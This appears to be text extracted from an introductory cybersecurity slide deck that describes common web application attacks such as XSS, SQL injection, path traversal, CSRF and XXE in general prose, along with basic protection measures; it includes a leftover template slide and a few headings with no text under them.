Web applications are software accessible via web browsers, distinct from local apps. Various web application attacks, including cross-site scripting (XSS), SQL injection (SQLi), and DDoS attacks, exploit vulnerabilities leading to unauthorized access and data theft. Protection measures include automated vulnerability scanning, web application firewalls, and secure development practices.

1. WEBAPPLICATION
ATTACKS
Cybersecurity

2. WebApplicationStatistics

3. WebApplication
- A web application is software that runs
on a web server and can be accessed by a
user through a web browser with an active
internet connection.This differs from local
software apps, which run directly on a user’s
device. Web applications are usually easy to
install on the user’s end, and can often be
customized to meet a business’s
specifications.

4. WebApplicationAttacks
- Web application attacks are malicious
activities that target web applications by
exploiting vulnerabilities in their design or
implementation. These attacks can result in
unauthorized access, data theft, or other
harmful consequences.

5. COMPANY/PRODUCTHISTORY
To create your own,
choose a topic that
interests you.

6. TYPESOFWEB
APPLICATION
ATTACKS
• Cross-site scripting (XSS):
In an XSS attack, an attacker injects a piece of malicious code
onto a trusted website or web-based app. Because the user’s
browser thinks the script came from a trusted source, it will
execute the script. XSS attacks can be used to steal data or
perform other malicious acts on the visitor’s computer. While this
method is considered unsophisticated, it’s common and can do
significant harm.

7. CROSS-SITE
SCRIPTING(XSS)

8. TYPESOFWEB
APPLICATION
ATTACKS
• SQL injection (SQLI):
SQLIs occur when an attacker meddles with the
queries that a web application makes to its database. An
SQLI can allow intruders to get sensitive data from the
database. An attacker might modify or delete this data, or
inject code that can change the web application's content or
behavior.

9. SQLINJECTION
(SQLI)

10. TYPESOFWEB
APPLICATION
ATTACKS
• Path traversal:
This attack, also known as directory traversal, allows the bad actor to manipulate
paths to folders outside the web root folder, which can then be used to access web
application files, directories and commands.
• Local file inclusion:
This technique tricks the web application into exposing or running its files on the
web server. These attacks occur when the web app treats a malicious attack as “trusted
input.” An attacker may use path or directory traversal to learn about the files on the
server, and then prompt the web app to run the local file. Local file inclusions can lead
to information disclosure, XSS and remote code execution.

11. TYPESOFWEB
APPLICATION
ATTACKS
• DDoS attacks:
These attacks happen when an attacker bombards a server with web
requests. Attackers may use a network of compromised computers or bots to
mount this attack, which can paralyze a server and prevent legitimate visitors from
gaining access to your services.
• Cross-site request forgery (CSRF):
CSRFs occur when an attacker tricks or forces an end user to execute
unwanted actions on an application in which they are already authenticated.

12. TYPESOFWEB
APPLICATION
ATTACKS
• XML external entity (XXE):
This attack relies on an improperly configured XML parser
within an application’s code. This attack can lead to the disclosure
of confidential data like passwords, denial of service, server-side
request forgery and other system impacts.

13. XMLEXTERNAL
ENTITY(XXE):

14. MostcommonvulnerabilitiesinWebApplications
• Broken Access control
• Cryptographic failures
• Injection
• Insecure design
• Security misconfiguration
• Vulnerable and outdated components
• Identification and authentication failures
• Software and data integrity failures
• Security logging and monitoring failures
• Server-side request forgery

15. Waystoprotectagaintswebsiteattacks
• Automated vulnerability
scanning and security testing
• Web application firewalls
• Secure development testing